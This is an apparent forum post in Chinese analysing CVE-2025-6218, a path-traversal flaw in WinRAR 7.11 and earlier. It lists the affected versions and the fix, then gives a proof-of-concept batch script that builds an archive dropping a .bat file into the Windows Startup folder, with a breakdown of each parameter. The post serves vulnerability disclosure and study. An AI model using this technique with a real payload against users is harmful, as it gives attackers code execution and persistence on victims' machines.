WinRAR目录遍历远程代码执行漏洞分析(CVE-2025-6218)
漏洞情况概述
漏洞名称:WinRAR路径穿越漏洞
CVE ID:CVE-2025-6218
威胁等级:高危
披露时间:2025年6月
厂商补丁:WinRAR 7.12版本修复
漏洞简介
在RARLAB公司的WinRAR压缩软件中发现一个严重安全漏洞(路径穿越漏洞)。攻击者可通过构造恶意压缩文件,在解压过程中将文件释放到受害者系统的敏感路径(如启动目录),实现远程代码执行(RCE) 或持久化控制。
利用条件
条件 |
说明 |
1️⃣ 软件版本 |
WinRAR 7.11及更早版本 |
2️⃣ 安装路径 |
默认安装位置 C:\Program Files\WinRAR\WinRAR.exe 或已知安装路径 |
3️⃣ 用户交互 |
用户需解压恶意压缩文件 |
影响范围
复制代码 隐藏代码
- RARLAB WinRAR 7.11及之前所有版本
+ 安全版本:WinRAR 7.12及以上
漏洞复现
环境配置
组件 |
版本 |
操作系统 |
Windows 11 专业版 |
WinRAR |
7.10 (漏洞版本) |
恶意压缩包构造脚本
复制代码 隐藏代码
@echo off
title CVE-2025-6218 POC
:: 创建恶意批处理文件
echo calc.exe > POC.bat
:: 构造恶意压缩包
"C:\Program Files\WinRAR\WinRAR.exe" a -ap" \..\..\..\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\" %~dp0CVE-2025-6218.zip POC.bat
:: 清理和结果提示
echo.
if errorlevel 1 (
echo [!] Failed to create POC.
) else (
echo [+] CVE-2025-6218.zip created successfully!
)
echo.
del POC.bat
pause
核心攻击代码解析
复制代码 隐藏代码
"C:\Program Files\WinRAR\WinRAR.exe" a
-ap" \..\..\..\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\"
%~dp0CVE-2025-6218.zip
POC.bat
参数 |
功能说明 |
a |
添加文件到压缩包 |
-ap |
设置压缩包内相对路径(利用..\ 进行路径穿越) |
%~dp0 |
当前脚本所在路径 |
POC.bat |
恶意执行文件 |
|
没有回复内容